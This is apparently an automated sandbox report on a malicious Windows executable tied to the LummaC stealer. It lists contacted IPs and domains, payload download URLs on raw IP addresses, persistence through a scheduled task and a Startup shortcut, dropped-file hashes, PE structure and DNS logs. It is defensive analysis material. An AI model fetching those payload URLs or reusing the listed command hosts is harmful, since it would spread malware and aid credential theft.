https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	8C8E1SFCKC1PZ3Q9HSG5ULYUCJYSJLU.exe, 0000000A.00000002.2853721841.000000000B4B0000.00000004.00000020.00020000.00000000.sdmp, f7eded9312.exe, 0000001C.00000003.2958572755.000000000564B000.00000004.00000800.00020000.00000000.sdmp	false
https://rentry.co/static/icons/512.png	f7eded9312.exe, 0000001C.00000003.3072345604.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	false
http://31.41.244.11/files/7254021059/abu7zly.exe	skotes.exe, 00000017.00000002.3459464987.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3459464987.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/steam/random.exe	2z8320.exe, 00000006.00000003.2416383311.00000000013AF000.00000004.00000020.00020000.00000000.sdmp	false
https://fallyjustif.click/apil3	f7eded9312.exe, 0000001C.00000003.2985029655.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, f7eded9312.exe, 0000001C.00000003.2996752252.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
216.58.206.68	www.google.com	United States	15169	GOOGLEUS	false
172.217.23.110	plus.l.google.com	United States	15169	GOOGLEUS	false
104.21.112.1	fancywaxxers.shop	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.26.3.16	rentry.co	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	fallyjustif.click	European Union	13335	CLOUDFLARENETUS	true
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
80.76.51.73	get.craca.ru	Bulgaria	43659	CLOUDCOMPUTINGDE	true

Private

IP
192.168.2.6
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583786
Start date and time:	2025-01-03 15:20:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	same.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@73/1016@10/13
EGA Information:	Successful, ratio: 71.4%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.210.172, 142.250.186.67, 142.250.185.206, 108.177.15.84, 172.217.18.14, 142.250.185.142, 142.250.185.195, 142.250.185.106, 142.250.185.170, 142.250.185.138, 142.250.185.202, 172.217.18.10, 216.58.206.74, 172.217.18.106, 216.58.206.42, 172.217.23.106, 142.250.186.42, 142.250.184.202, 142.250.185.234, 142.250.186.138, 142.250.186.74, 142.250.181.234, 142.250.186.170, 142.250.186.174, 142.250.185.74, 142.250.184.234, 216.58.212.138, 13.107.246.45, 20.12.23.50, 23.56.254.164
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
Execution Graph export aborted for target 2z8320.exe, PID 6012 because there are no executed function
Execution Graph export aborted for target 8C8E1SFCKC1PZ3Q9HSG5ULYUCJYSJLU.exe, PID 3872 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:21:12	API Interceptor	9x Sleep call for process: 2z8320.exe modified
09:21:58	API Interceptor	62x Sleep call for process: 8C8E1SFCKC1PZ3Q9HSG5ULYUCJYSJLU.exe modified
09:22:01	API Interceptor	66270x Sleep call for process: skotes.exe modified
09:22:15	API Interceptor	354x Sleep call for process: abu7zly.exe modified
09:22:18	API Interceptor	8x Sleep call for process: f7eded9312.exe modified
15:21:06	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
15:22:16	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	nayfObR.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.112.1

Process:	C:\Users\user\AppData\Local\Temp\8C8E1SFCKC1PZ3Q9HSG5ULYUCJYSJLU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.08979752538941
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWYZdi1zNtPMKAkzZ7okEt9r1JDSgzMMd6qD47u3+CO:+/Ps+wsI7yn5kPAkzItSmd6qE7lFoC
MD5:	745545A0F602CA217E7487E7DC60AF50
SHA1:	B9A43B637F68E915935F99CC1606D0DB4AFCCBA3
SHA-256:	C79B650AD4F0834D2C312C82A5B8DD9AD11DAB20CEC6A288F533BC7055EEF0F7
SHA-512:	8773B29652B4A303B2ABE3F99EA2BD57A3CE33488AF1091BD303309CC77310007D55998A30A60252D19F6D7D6DD7EE6AE248ABBC9DB3D7A1BDC761CEF899AB1D
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.6599547231656377
Encrypted:	false
SSDEEP:	3:NlllulRlltl:NllU
MD5:	2AAC5546A51052C82C51A111418615EB
SHA1:	14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
SHA-256:	DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
SHA-512:	1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

Process:	C:\Users\user\Desktop\same.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2850304
Entropy (8bit):	6.465164934411058
Encrypted:	false
SSDEEP:	49152:kJJtBgpVF7YkXgZ/GkGDZdsfztMkbtYrQxvfDud:kTt+F7YkXO/yDZd6xYsxju
MD5:	C96F81336AD8BDAAE4ADD552570D9018
SHA1:	57A1520F41DBEA5BD734426B97A85306157F98A6
SHA-256:	569CB514F2B13DBEA223F2DF9FEA9CF8C8A66F36D292BB579DE772B2473D7C7D
SHA-512:	32B041BC79E0511141BB56D25E1EEC60E90F27B029716982786D38F1EDEB7C96797BEEC6E293C593F2239A1069C1FD72BC0FF090F82130FA360FF0C0D7875401
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ....................... ,......?,...`.................................U...i....`..D........................................................................................................... . .@... ....... ..............@....rsrc...D....`.......2..............@....idata . ...........6..............@...porhymqd. +...... +..8..............@...sherscit. ....+......X+.............@....taggant.@....+.."...\+.............@...................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (848)
Category:	downloaded
Size (bytes):	853
Entropy (8bit):	5.201906176748183
Encrypted:	false
SSDEEP:	24:h+yEvj+TOGsmBHslgT9lCuABATr7uoB7HHHHHHHYqmffffffo:hZcmKlgZ01BA37uSEqmffffffo
MD5:	E4A97AF76D8C61F242B76BF0480BF228
SHA1:	2EDD747CE8F0169EBE7334BCC5D69C921D13DEAD
SHA-256:	BBABFC6EED0D0660CAAE665BB8D2501FD53BB52F0391FFBF2C3356AA6B735056
SHA-512:	B6803807726E1842F43B6394921DA0E7D55030954F2B517A438F5F055B97B682B1EBCF0D024E2961E6D6C5225AB8159C0E9299F02B20C5D0936A912A4F7E8703
Malicious:	false
Reputation:	unknown
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["killer whale dead calf","marvel rivals season 1 fantastic four","world juniors hockey championship","walmart broccoli recall listeria","monopoly go friendship pays rewards","quadrantids meteor showers","winter storm snow forecast","nfl mock drafts"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":6297182249330378593,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x694238	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6a1000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	b0b66b32f4ca82e2e157c51b24da0be7	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	7b9890a93c0516bb070e1170cfde54d5	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	67ce48bf2e7c8fe3321ca7aa188f77e2	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x695000	0x694400	7867bd436fb9b1fcdd3691a9fb0c5674	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6a1000	0x888	0xa00	6025c825c4098ef081ac8ee3c8d5dd22	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AVI	0xcb30	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States	0.2713099474665311
RT_ICON	0xf94c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3225609756097561
RT_ICON	0xffb4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.41263440860215056
RT_ICON	0x1029c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4569672131147541
RT_ICON	0x10484	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5574324324324325
RT_ICON	0x105ac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6223347547974414
RT_ICON	0x11454	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7369133574007221
RT_ICON	0x11cfc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.783410138248848
RT_ICON	0x123c4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3829479768786127
RT_ICON	0x1292c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004662673505254
RT_ICON	0x20300	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5300829875518672
RT_ICON	0x228a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6137429643527205
RT_ICON	0x23950	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.703688524590164
RT_ICON	0x242d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.425531914893617
RT_DIALOG	0x24740	0x2f2	data	English	United States	0.4389920424403183
RT_DIALOG	0x24a34	0x35c	data	Russian	Russia	0.44534883720930235
RT_DIALOG	0x24d90	0x1b0	data	English	United States	0.5625
RT_DIALOG	0x24f40	0x1b4	data	Russian	Russia	0.573394495412844
RT_DIALOG	0x250f4	0x166	data	English	United States	0.5223463687150838
RT_DIALOG	0x2525c	0x168	data	Russian	Russia	0.5361111111111111
RT_DIALOG	0x253c4	0x1c0	data	English	United States	0.5446428571428571
RT_DIALOG	0x25584	0x1e0	data	Russian	Russia	0.55
RT_DIALOG	0x25764	0x130	data	English	United States	0.5526315789473685
RT_DIALOG	0x25894	0x150	data	Russian	Russia	0.5416666666666666
RT_DIALOG	0x259e4	0x120	data	English	United States	0.5763888888888888
RT_DIALOG	0x25b04	0x122	data	Russian	Russia	0.5793103448275863
RT_STRING	0x25c28	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States	0.6214285714285714
RT_STRING	0x25cb4	0x86	Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0	Russian	Russia	0.7164179104477612
RT_STRING	0x25d3c	0x520	data	English	United States	0.4032012195121951
RT_STRING	0x2625c	0x52e	data	Russian	Russia	0.39441930618401205
RT_STRING	0x2678c	0x5cc	data	English	United States	0.36455525606469
RT_STRING	0x26d58	0x592	data	Russian	Russia	0.4011220196353436
RT_STRING	0x272ec	0x4b0	data	English	United States	0.385
RT_STRING	0x2779c	0x4b2	data	Russian	Russia	0.3910149750415973
RT_STRING	0x27c50	0x44a	data	English	United States	0.3970856102003643
RT_STRING	0x2809c	0x43e	data	Russian	Russia	0.4567219152854512
RT_STRING	0x284dc	0x3ce	data	English	United States	0.36858316221765913
RT_STRING	0x288ac	0x2fc	data	Russian	Russia	0.4424083769633508
RT_RCDATA	0x28ba8	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x28bb0	0x676559	Microsoft Cabinet archive data, many, 6776153 bytes, 2 files, at 0x2c +A "N4H84.exe" +A "4O211C.exe", ID 1392, number 1, 248 datablocks, 0x1503 compression	Russian	Russia	0.9998254776000977
RT_RCDATA	0x69f10c	0x4	data	Russian	Russia	3.0
RT_RCDATA	0x69f110	0x24	data	Russian	Russia	0.8055555555555556
RT_RCDATA	0x69f134	0x7	ASCII text, with no line terminators	Russian	Russia	2.142857142857143
RT_RCDATA	0x69f13c	0x7	ASCII text, with no line terminators	Russian	Russia	2.142857142857143
RT_RCDATA	0x69f144	0x4	data	Russian	Russia	3.0
RT_RCDATA	0x69f148	0xb	ASCII text, with no line terminators	English	United States	1.7272727272727273
RT_RCDATA	0x69f154	0x4	data	Russian	Russia	3.0
RT_RCDATA	0x69f158	0xa	data	English	United States	1.8
RT_RCDATA	0x69f164	0x4	data	Russian	Russia	3.0
RT_RCDATA	0x69f168	0x6	data	Russian	Russia	2.3333333333333335
RT_RCDATA	0x69f170	0x7	ASCII text, with no line terminators	Russian	Russia	2.142857142857143
RT_RCDATA	0x69f178	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_GROUP_ICON	0x69f180	0xbc	data	English	United States	0.6117021276595744
RT_VERSION	0x69f23c	0x408	data	English	United States	0.42441860465116277
RT_VERSION	0x69f644	0x410	data	Russian	Russia	0.46826923076923077
RT_MANIFEST	0x69fa54	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3761149653121903

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 15:21:12.403096914 CET	192.168.2.6	1.1.1.1	0xcba4	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:37.303508043 CET	192.168.2.6	1.1.1.1	0xb3e4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:37.303827047 CET	192.168.2.6	1.1.1.1	0x359f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 3, 2025 15:21:40.639113903 CET	192.168.2.6	1.1.1.1	0x9656	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:40.639277935 CET	192.168.2.6	1.1.1.1	0x7cd5	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Jan 3, 2025 15:21:41.631186008 CET	192.168.2.6	1.1.1.1	0x41a6	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:41.632884026 CET	192.168.2.6	1.1.1.1	0xb506	Standard query (0)	play.google.com	65	IN (0x0001)	false
Jan 3, 2025 15:22:16.108177900 CET	192.168.2.6	1.1.1.1	0x1797	Standard query (0)	get.craca.ru	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:22:17.794809103 CET	192.168.2.6	1.1.1.1	0x2dcf	Standard query (0)	fallyjustif.click	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:22:33.498379946 CET	192.168.2.6	1.1.1.1	0x32ba	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 15:21:12.414611101 CET	1.1.1.1	192.168.2.6	0xcba4	No error (0)	fancywaxxers.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:12.414611101 CET	1.1.1.1	192.168.2.6	0xcba4	No error (0)	fancywaxxers.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:12.414611101 CET	1.1.1.1	192.168.2.6	0xcba4	No error (0)	fancywaxxers.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:12.414611101 CET	1.1.1.1	192.168.2.6	0xcba4	No error (0)	fancywaxxers.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:12.414611101 CET	1.1.1.1	192.168.2.6	0xcba4	No error (0)	fancywaxxers.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:12.414611101 CET	1.1.1.1	192.168.2.6	0xcba4	No error (0)	fancywaxxers.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:12.414611101 CET	1.1.1.1	192.168.2.6	0xcba4	No error (0)	fancywaxxers.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:37.310394049 CET	1.1.1.1	192.168.2.6	0xb3e4	No error (0)	www.google.com		216.58.206.68	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:37.310534954 CET	1.1.1.1	192.168.2.6	0x359f	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 3, 2025 15:21:40.645809889 CET	1.1.1.1	192.168.2.6	0x9656	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 15:21:40.645809889 CET	1.1.1.1	192.168.2.6	0x9656	No error (0)	plus.l.google.com		172.217.23.110	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:21:40.645824909 CET	1.1.1.1	192.168.2.6	0x7cd5	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 15:21:41.637943029 CET	1.1.1.1	192.168.2.6	0x41a6	No error (0)	play.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:22:16.395329952 CET	1.1.1.1	192.168.2.6	0x1797	No error (0)	get.craca.ru		80.76.51.73	A (IP address)	IN (0x0001)	false
Jan 3, 2025 15:22:17.807988882 CET	1.1.1.1	192.168.2.6	0x2dcf	No error (0)	fallyjustif.click		188.114.96.3	A (IP address)	IN (0x0001)	false
